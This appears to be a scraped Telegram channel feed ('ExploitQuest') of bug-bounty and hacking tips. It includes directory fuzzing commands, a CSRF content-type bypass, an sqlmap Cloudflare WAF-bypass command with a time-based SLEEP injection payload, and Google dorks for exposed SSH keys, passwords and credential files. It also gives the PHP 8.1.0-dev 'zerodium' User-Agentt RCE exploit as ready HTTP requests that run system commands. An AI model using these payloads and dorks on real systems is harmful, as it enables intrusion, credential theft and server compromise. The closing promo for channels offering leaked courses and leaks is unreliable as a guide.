ffuf -u http://target.com/FUZZ -w wordlist.txt -e .json,.xml,.bak,.sql,.zip,.log,.config,.env -c -t 50 -recursion -recursion-depth 2 -s -mc 200,301,302 -o results.json
❤9
What does the command do?
Searches for hidden or useful files or paths within the list of links. It is used in security testing to detect sensitive or exposed files on the server.
dirsearch -l urls.txt -e
conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx
~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,con
f,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,ol
d,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,t
ar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-
recursive --force-recursive --exclude-sizes=0B --
random-agent --full-url -o output.txt
👍5🔥4❤1
👍4👏1
This media is not supported in your browser
VIEW IN TELEGRAM
Bruteforce directories and files :
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
• dir : directory scanning mode
• -u : target URL
• -w : path to dictionary
Other useful parameters:
• -x : file extensions ( .php , .html )
• -t : number of threads
• -c : cookie
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
• dir : directory scanning mode
• -u : target URL
• -w : path to dictionary
Other useful parameters:
• -x : file extensions ( .php , .html )
• -t : number of threads
• -c : cookie
🔥10
ExploitQuest
Photo
A simple CSRF bypass to check if your target is sending JSON data without an anti-CSRF token
Change the content type from application/json to text/plain and see if it still accepts the request
Steps to Check for CSRF Bypass
Identify the Target Request:
Find the endpoint that accepts JSON data and requires CSRF protection.
Capture the Request:
Use tools like Burp Suite, Postman, or browser developer tools to capture the original request.
Original Request (expected by the server):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: application/json
{
"email": "test@example.com"
}
Modified Request (for testing CSRF bypass):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: text/plain
{
"email": "test@example.com"
}
Expected Results:
If the server accepts the request:
The endpoint may not validate the Content-Type.
This can allow a malicious actor to exploit the endpoint using CSRF.
If the server rejects the request:
It validates the Content-Type, which is a good security practice.
This reduces the risk of CSRF exploitation
❤7👍2
One line to find all subdomains of a target site and list the favicon hashes.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
subfinder -d canva.com | httpx -favicon -j | jq -r .favicon | grep -v null | sort-u
🔥3
Bypass waf for SQL injection :)
cloudflare
command :
time-based blind:
cloudflare
command :
sqlmap -u "target.com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
time-based blind:
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
🔥7👍4❤2
Here are 10 Google Dorks that are new and useful for bug bounty hunters during reconnaissance:
1•Finding Configuration or Settings Files
inurl:settings filetype:json OR filetype:xml
•Purpose: Locate configuration files that might contain sensitive keys or settings.
2•Searching for Backup Files on Servers
intitle:index.of "backup" OR "bkp" OR "bak"
•Purpose: Identify exposed backup files in public directories.
3•Discovering Application Error Logs
inurl:error.log OR inurl:debug.log filetype:log
•Purpose: Find log files that may reveal sensitive server paths or IP addresses.
4•Locating Database Configuration Files
inurl:dbconfig OR inurl:database filetype:ini OR filetype:env
•Purpose: Expose database settings or credentials.
5•Finding Exposed API Endpoints
inurl:api OR inurl:swagger filetype:json
•Purpose: Identify exposed APIs or Swagger documentation.
6•Searching for Private SSH Keys
intitle:index.of id_rsa OR id_dsa filetype:key
•Purpose: Detect publicly accessible SSH private keys.
7•Exposing Hardcoded Passwords
intext:"password=" OR "pwd=" OR "pass=" filetype:properties OR filetype:txt
•Purpose: Find plaintext passwords in configuration or text files.
8•Finding Confidential Documents
site:example.com filetype:pdf OR filetype:xls "confidential"
•Purpose: Locate sensitive or confidential documents.
9•Detecting Files with Exported Data
inurl:exports OR inurl:downloads filetype:csv OR filetype:txt
•Purpose: Discover exported user data or logs.
10•Identifying Cloud Configuration Files
intext:"cloud" OR "aws" OR "gcp" filetype:yml OR filetype:yaml
•Purpose: Expose cloud service configurations such as AWS or GCP.
👍11❤4🔥4
How do hackers find hidden pages on your site?
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
🛠 Examples of use:
• Fuzzing with custom headers:
• Recursive Fuzzing with Specific Depth:
• Targeting specific patterns in responses:
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
🛠 Examples of use:
• Fuzzing with custom headers:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -H "Custom-Header: value"
• Recursive Fuzzing with Specific Depth:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -recursion -recursion-depth 2
• Targeting specific patterns in responses:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -mr "regex-pattern"
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
🔥6👍1
PHP 8.1.0-dev RCE via User-Agentt Exploit
Introduction
In some versions of PHP 8.1.0-dev, a Remote Code Execution (RCE) vulnerability was discovered through an uncommon HTTP header called User-Agentt. This vulnerability can be exploited if the application processes incoming headers without proper sanitization, allowing arbitrary system commands to be executed on the server.
How Does the Vulnerability Work?
The vulnerability occurs when the application uses
$_SERVER['HTTP_USER_AGENTT']
unsafely, especially if the value is passed to functions like eval() or system().
If input validation is not implemented, attackers can execute unauthorized commands directly on the server.
Example of Vulnerable PHP Code
<?php
$user_agent = $_SERVER['HTTP_USER_AGENTT'];
eval($user_agent);
?>
Why is this dangerous?
Because an attacker can send an HTTP request with a User-Agentt header containing malicious PHP code, which will be executed directly on the server.
How to Exploit the Vulnerability
1. Testing Delay with sleep()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);
•If the response is delayed by 5 seconds, it confirms that the code is being executed successfully.
2. Executing a System Command
with system()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');
•If the server responds with user information such as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
•this means RCE exploitation is successful.
3. Executing PHP via phpinfo()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();
•This might display the current PHP configuration, which helps in understanding the target environment.
Conclusion
This vulnerability is extremely dangerous because it allows direct command execution on the server, potentially leading to a full compromise. Developers must be cautious about handling external inputs and always keep their PHP versions up to date.
#ExploitQuest #ExploitQuest
@ExploitQuest
👍5❤1
Forwarded from Global Red Team
أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@iiLinux
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@Egyshield
@GlobalRedTeam
@darkcsc
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.
@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.
@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.